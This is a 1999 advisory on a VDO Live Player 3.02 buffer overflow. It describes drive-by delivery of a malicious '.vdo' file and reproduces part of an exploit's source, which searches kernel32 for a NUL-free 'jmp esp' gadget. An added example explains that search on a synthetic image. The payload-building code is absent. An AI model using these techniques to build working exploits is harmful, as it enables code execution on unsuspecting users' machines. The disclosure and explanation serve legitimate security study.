VDO Live Player 3.02 contains an exploitable buffer overflow (vdo://)
13 Dec. 1999
Summary
VDO Live Player overflows when it reads a '.vdo' file that contains an overly long vdo address. If VDO Live Player is installed on the system and the browser's default settings are in use, '.vdo' files are downloaded and handed to the player without any confirmation.
Therefore, if a client visits a web page that triggers an automatic download of a '.vdo' file (for example, via a META REFRESH tag) and that file contains attack code, the client machine will be compromised.
Credit:
The information has been provided by: UNYUN.
The following sample source code generates a '.vdo' file that executes an arbitrary command on the visitor's machine:
(This code was tested on Japanese Windows 98 only.)
-----
/*===============================================================
ex_vdolive.c / VDO Live Player 3.02 32bit exploit
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN (shadowpenguin@backsection.net)
================================================================
*/
/* The headers, the three #defines and the main() prologue below are
   reconstructed so that the fragment compiles; the page reproduces only
   part of the original listing.  KERNEL_NAME is assumed to be kernel32.dll
   (the only module the code searches); JMPESP_1/JMPESP_2 are the two bytes
   of the x86 "jmp esp" instruction, FF E4, as the macro names indicate. */
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

#define KERNEL_NAME "kernel32.dll"
#define JMPESP_1    0xff
#define JMPESP_2    0xe4

/* Scan [st,ed) for the byte pair c1 c2 and return the address of the first
   hit whose four address bytes are all non-zero.  The address is written
   into the '.vdo' file as part of a string, so a NUL byte in it would cut
   the payload short.  The main() fragment below repeats this scan inline
   instead of calling it. */
unsigned int search_mem(unsigned char *st,unsigned char *ed,
                        unsigned char c1,unsigned char c2)
{
    unsigned char *p;
    unsigned int adr;
    for (p=st;p<ed;p++)
        if (*p==c1 && *(p+1)==c2){
            adr=(unsigned int)p;
            if ((adr&0xff)==0) continue;
            if (((adr>>8)&0xff)==0) continue;
            if (((adr>>16)&0xff)==0) continue;
            if (((adr>>24)&0xff)==0) continue;
            return(adr);
        }
    return(0);
}

int main(int argc,char *argv[])
{
    unsigned int kp,ip,i;          /* 32-bit addresses: kernel32 base, candidate */
    unsigned char *q;
    MEMORY_BASIC_INFORMATION meminfo;

    if (argc<2){
        printf("usage: %s FileName Command\n",argv[0]);
        exit(1);
    }
    /* Map kernel32.dll into this process; it loads at the same address in
       the victim's player, so an address found here is valid there too. */
    if ((void *)(kp=(unsigned int)LoadLibrary(KERNEL_NAME))==NULL){
        printf("Can not find %s\n",KERNEL_NAME);
        exit(1);
    }
    /* Walk the first committed region of the module for a NUL-free
       "jmp esp" (FF E4) to use as the overwritten return address. */
    VirtualQuery((void *)kp,&meminfo,sizeof(MEMORY_BASIC_INFORMATION));
    for (i=0;i<meminfo.RegionSize;i++){
        ip=kp+i;
        if ( ( ip &0xff)==0
          || ((ip>>8 )&0xff)==0
          || ((ip>>16)&0xff)==0
          || ((ip>>24)&0xff)==0) continue;
        q=(unsigned char *)ip;
        if (*q==JMPESP_1 && *(q+1)==JMPESP_2) break;
    }
    if (i==meminfo.RegionSize){
        printf("Can not find codes which are used by this exploit.\n");
        exit(1);
    }
    /* The remainder of the original listing (building the '.vdo' file from
       the long vdo address, the jmp esp address found above and the command
       payload) is not reproduced on this page. */
    return 0;
}
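The part of the listing that is complete is the gadget search: find a "jmp esp" (FF E4) in kernel32 whose address contains no zero byte, because the address is embedded in the string-based '.vdo' file and a NUL would end the string early. The example below is added here and is not code from the advisory or from Shadow Penguin Security; it isolates that search so it can be run on any platform. Instead of LoadLibrary/VirtualQuery it scans a constructed byte image, and the module base 0x77E80000 is an illustrative assumption chosen to look like a high-loaded DLL; the second call shows why the search is aimed at a DLL rather than the main executable, whose default base 0x00400000 puts a NUL in every address.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* x86 "jmp esp" encoding, the gadget the advisory's exploit looks for. */
#define JMP_ESP_1 0xff
#define JMP_ESP_2 0xe4

/* True if any of the four bytes of the 32-bit address is zero. */
int addr_has_nul_byte(uint32_t addr)
{
    return ((addr & 0xff) == 0) || (((addr >> 8) & 0xff) == 0) ||
           (((addr >> 16) & 0xff) == 0) || (((addr >> 24) & 0xff) == 0);
}

/* Same property, shown the way it bites: pack the address little-endian
   into a C string and check that strlen() still sees all four bytes. */
int addr_survives_strcpy(uint32_t addr)
{
    unsigned char buf[5];
    buf[0] = (unsigned char)(addr & 0xff);
    buf[1] = (unsigned char)((addr >> 8) & 0xff);
    buf[2] = (unsigned char)((addr >> 16) & 0xff);
    buf[3] = (unsigned char)((addr >> 24) & 0xff);
    buf[4] = 0;
    return strlen((const char *)buf) == 4;
}

/* Scan an image for the byte pair c1 c2 and return the virtual address the
   hit would have when the image is loaded at 'base', skipping hits whose
   address contains a NUL byte.  Returns 0 if nothing usable is found. */
uint32_t find_gadget(const unsigned char *img, size_t len, uint32_t base,
                     unsigned char c1, unsigned char c2)
{
    size_t i;
    for (i = 0; i + 1 < len; i++) {
        if (img[i] == c1 && img[i + 1] == c2) {
            uint32_t va = base + (uint32_t)i;
            if (addr_has_nul_byte(va))
                continue;
            return va;
        }
    }
    return 0;
}

/* Constructed sample image (not a real module): two "jmp esp" occurrences,
   one at an offset whose address ends in 0x00 and one that is usable. */
uint32_t demo_search(uint32_t base)
{
    unsigned char img[0x300];
    memset(img, 0, sizeof img);
    img[0x100] = JMP_ESP_1; img[0x101] = JMP_ESP_2;  /* base+0x100: low byte 00 */
    img[0x211] = JMP_ESP_1; img[0x212] = JMP_ESP_2;  /* base+0x211: NUL-free */
    return find_gadget(img, sizeof img, base, JMP_ESP_1, JMP_ESP_2);
}

int main(void)
{
    /* Assumed DLL base: the first hit is rejected, the second is returned. */
    uint32_t dll_hit = demo_search(0x77E80000u);
    /* Default EXE base: the top address byte is always 0x00, so no hit is usable. */
    uint32_t exe_hit = demo_search(0x00400000u);
    printf("DLL image : jmp esp at %08x (strcpy-safe: %d)\n",
           (unsigned)dll_hit, addr_survives_strcpy(dll_hit));
    printf("EXE image : %s\n", exe_hit ? "found" : "no NUL-free gadget");
    return 0;
}
```

The inline check in the advisory's main() is the same test as addr_has_nul_byte(); addr_survives_strcpy() makes the consequence visible, since a rejected address would be truncated by any C-string copy inside the player's '.vdo' parser.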